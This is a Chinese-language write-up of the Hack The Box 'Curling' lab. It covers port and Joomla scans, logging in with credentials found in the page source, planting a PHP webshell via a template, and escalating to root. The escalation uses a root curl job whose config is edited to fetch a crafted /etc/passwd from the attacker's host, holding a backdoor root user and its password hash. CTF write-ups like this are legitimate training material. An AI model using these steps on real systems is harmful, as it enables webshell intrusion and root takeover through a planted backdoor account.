打靶记录(一二五)之HTBCurling

端口扫描

┌──(mikannse㉿kali)-[~/HTB]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 13:34 CST
Warning: 10.10.10.150 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.150
Host is up (0.074s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 12.47 seconds

┌──(mikannse㉿kali)-[~/HTB]
└─$ sudo nmap -sT -sV -sC -O -p22,80 10.10.10.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 13:35 CST
Nmap scan report for 10.10.10.150
Host is up (0.078s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.18 seconds

Web

80端口开设了一个joomlaCMS,用joomscan扫一下

    ____  _____  _____  __  __  ___   ___    __    _  _ 
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  ( 
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                        (1337.today)
   
    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://10.10.10.150/ ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version                                                                         
[++] Joomla 3.8.8                                                                                    
                                                                                                     
[+] Core Joomla Vulnerability                                                                        
[++] Target Joomla core is not vulnerable                                                            
                                                                                                     
[+] Checking Directory Listing                                                                       
[++] directory has directory listing :                                                               
http://10.10.10.150/administrator/components                                                         
http://10.10.10.150/administrator/modules                                                            
http://10.10.10.150/administrator/templates                                                          
http://10.10.10.150/images/banners                                                                   
                                                                                                     
                                                                                                     
[+] Checking apache info/status files                                                                
[++] Readable info/status files are not found                                                        
                                                                                                     
[+] admin finder                                                                                     
[++] Admin page : http://10.10.10.150/administrator/                                                 
                                                                                                     
[+] Checking robots.txt existing                                                                     
[++] robots.txt is not found                                                                         
                                                                                                     
[+] Finding common backup files name                                                                 
[++] Backup files are not found                                                                      
                                                                                                     
[+] Finding common log files name                                                                    
[++] error log is not found                                                                          
                                                                                                     
[+] Checking sensitive config.php.x file                                                             
[++] Readable config files are not found                                                             
                                                                                                     
                                                                                                     
Your Report : reports/10.10.10.150/

3.8.8这个版本似乎是没有可利用的漏洞的，那么也许要从组件漏洞入手?不过在源码中发现一个secret.txt，得到一串像是密码的东西

Curling2018!,使用文章结尾作为用户名floris

在 http://10.10.10.150/administrator/ 页面使用凭证登录

成为超级管理员之后，就能尝试RCE了

https://book.hacktricks.xyz/v/cn/network-services-pentesting/pentesting-web/joomla

在protostar的index.php加一句一句话木马，执行whoami，我们是www-data,做个反弹shell

提权

在web目录的configurtation.php中找到了数据库密码:mYsQ!P4ssw0rd$yea!,但是连接上之后没有特别的内容

在floris家目录找到一个备份，处理一下其中的偏移和ascii旁注

┌──(mikannse㉿kali)-[~/HTB/curling]
└─$ cat key_dump| sed 's/^.*: \(.*\)  .*$/\1/' | tr -d ' \n'
425a6839314159265359819bbb48000017fffffc41cf05f95029617661cc3a344edccccc6e11540023ab4025f802196020180ca000921c7a8340000000000000068069883468646989a6d439ea68c800000f51a00064681a069ea190000000346900078135016e18c2d78c98874a13a00868ae19c02ab0c17d792ec23c7e9d78f53e0809f0735654c27a4886dfa2e931c856921b122133856046a2ddc1730d22b9966ed40cdb87376a3a58ea64115290ad6bb12f081381208205a5f52970c50337dbab3be000ef85f439a414885018438259be5009861e4842d513ea1c2a098c8a47ab1d20a7554072ff177245385090819bbb48 

在cyberchef中能直接得到原始文件中的密码:5d<wdCbdZu)|hChXll,ssh登录floris用户。根据房间提示有一个进程有问题，那么上传pspy

发现一个可疑进程:curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

-K参数用于导入配置文件,那么也就是说这个进程会curl一个网页，然后将结果输出到output。并且发现这个input配置文件我们是有权限编写的。那就让他来curl本地文件然后覆盖，相当于我们有权限在任何目录写一个文件。

那么尝试添加一个后门root用户:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
floris:x:1000:1004:floris:/home/floris:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0::/root:/bin/bash

将这个文件写到本地然后kali本地开启一个80端口服务器

更改input配置文件:

floris@curling:~/admin-area$ cat input 
url = "http://10.10.14.11/passwd"
output="/etc/passwd"

等本地接收到curl，然后su到hack用户,密码是hack,已经是root权限!

碎碎念

joomla的RCE和wordpress其实差不多，就是更改模板写入一个phpWebshell,后面提权还是比较有意思，虽然用的是进程提权,但实际就是利用curl来以root权限写入任意文件，那么以写文件的方式来提权就有挺多方式了，写sudoers(虽然我试了并不行),写/etc/passwd,或者像官网WP那些写计划任务来反弹shell也可以